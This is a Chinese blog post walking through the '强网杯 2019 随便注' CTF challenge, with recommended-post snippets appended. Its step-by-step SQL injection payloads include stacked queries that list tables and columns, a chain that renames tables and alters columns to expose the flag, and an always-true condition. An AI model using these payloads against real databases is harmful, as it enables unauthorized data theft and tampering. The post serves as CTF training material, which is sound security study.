[强网杯 2019]随便注

最新推荐文章于 2024-10-02 00:27:17 发布
最新推荐文章于 2024-10-02 00:27:17 发布
阅读量58 收藏
点赞数
分类专栏: 网络安全 文章标签: 数据库 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45237160/article/details/128593625
版权

访问链接页面如下

提交参数为一测试

测试整数型还是单双引号型注入,结果为单引号注入

进行多个结果查询,尝试查找漏洞,输入以下语句发现有正则表达式对某些关键词进行过滤(大小写就不用考虑了)

1’; select database();#

尝试双词写入,并没有作用

1’; selslectect database();#

尝试用其他关键词,比如说show,成功注入,得到两个表

1'; show tables;#

分别查看两个表中的列名

1'; show columns from `1919810931114514`;#
1'; show columns from words;#

发现在表`1919810931114514`中有我们想要的数据flag,怎么得到呢,观察words表的列名,我们发现字段id为int类型,字段data为字符串类型,正好对应在输入框中输入数字得到数据的模板,因此我们判定这个查询框绑定着words表,输入的查询值为id,此处我们只能通过输入id回显字段的值,因此思路为:

  • 把原来的worlds表改名为word2,

  • 然后把flag存在的表`1919810931114514`改名为worlds

  • 并且把flag字段改名为data(因为页面中回显的是data字段的值)

改变表名:

rename table 旧表名 to 新表名;

改变表中的字段名

ALTER TABLE 表名 CHANGE 旧字段名 新字段名 新数据类型;

给表新增字段

ALTER TABLE 表 ADD COLUMN 字段1 字段类型 DEFAULT 默认值

最终构造语句为


1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);#

(这个语句要编写完一起放进去执行,如果分布执行的话会失败)

可以查看一下表,验证是否更改成功

1'; show tables;#

执行结束输入万能语句取出我们想要的值

1' or '1'='1

做一个厉害的人
关注
专栏目录
BMZCTF 强网杯 2019 随便 原理+题解
AAAAAAAAAAAA66的博客
12-20 796
目录 知识点 堆叠入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠入 堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。 比如: (这样一下就会执行2条命令,与union入有相似的地方,union入可以在一条语句中执行多个操作,而堆叠入可以在一次输入中执行多条语句) ?id=1 ;show database; ...
强网杯2019 随便
BlueDoorZz的博客
07-11 437
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
【BUUCTF】强网杯 2019随便1 write up
GZWZ_的博客
04-06 4867
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
[CTF]强网杯2019随便
凉水的博客
10-16 366
简介 对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。 关键点 1 发现入点 这题很容易实验,最简单的1’ or 1之类的语句可以测出来,闭环单引号就可以。 #释符号,如果没起作用,需要意使用url编码。 2 PHP的防入 发现可以随便之后,试了union select之类的,也面提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 搜了一圈,没发现可以绕过的方法。 然后尝试多语句
强网杯 2019 随便
Misaka10046的博客
07-05 288
首先尝试直接去入,发现好像并没有什么用 尝试使用union盲,preg_match() 函数可以根据正则表达式对字符串进行搜索匹配,发现全被禁了,所以排除union入 使用show,发现可以查看表名 使用desc指令分别去查看这两个表结构的详细信息,这里1919810931114514这个表名必须要使用括起来。 因为发现这里过滤了很多函数,因此考虑怎么去绕过。 这里采用了预处理的语句。先把 select * from ` 1919810931114514 `,通过16进制编码变成一串数字
(转载)强网杯2019 随便
yingyugo的博客
11-24 241
虽然题目做得不多但是工具这题考察的知识面很广 尝试入: 1,测试 1’ or 1=1 # ,初步判定存在SQL入。 1' or 1=1 # 再测试字段数,到3时报错,说明字段数为2. 1' order by 1 # 接着尝试union入,回显了过滤的关键字。 1’ union select 1,2# 然后就是今天学会的新姿势“堆叠入”了。 原理很简单,就是通过 ; 号入多条SQL语句。 先通过show databases爆出数据库。 0'; show databases; # 然后
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
[强网杯 2019]随便 1
tomatoff的博客
03-14 2851
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
buuoj强网杯2019随便
qq_43619533的博客
12-07 1669
buuoj强网杯2019随便 打开环境: 查看源码: 说明sqlmap行不通。 返回页面 依次输入: 1 1' 1' # 1’ order by 2 # 发现可以正常显示,入题,并且爆出了字段数。 输入select return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤掉了这些...
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
BMZCTF 强网杯 2019 随便
qq_26243045的博客
11-29 403
考点:sql入、二次入 打开网页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
实用SQL小总结
UntifA的博客
09-29 1200
SQL记录
点评项目-2-完善册登录业务
m0_75138009的博客
09-29 489
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 641
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
k8s搭建一主三从的mysql8集群---无坑
oopxiajun博客专栏
09-27 995
对于构建基于MySQL的大规模、高性能应用来讲,需要使用水平扩展(集群)的数据库架构方式。在MySQL内建的复制功能可以实现,通过为服务器配置一个或多个备库的方式来进行数据同步。同时复制功能不仅有利于构建高性能的应用,也是高可用性、可扩展性、容灾、备份以及数据仓库等工作的基础。复制的基本原理是让一台服务器的数据与其他服务器保持同步。一台主库的数据可以同步到多台备库上,备库本身也可以被配置成另外一台服务器的主库。主库和备库之间可以有多种不同的组合方式。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
最新发布
qq 117791303
10-02 138
Wintergrasp 冬拥湖 120 VS 120
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值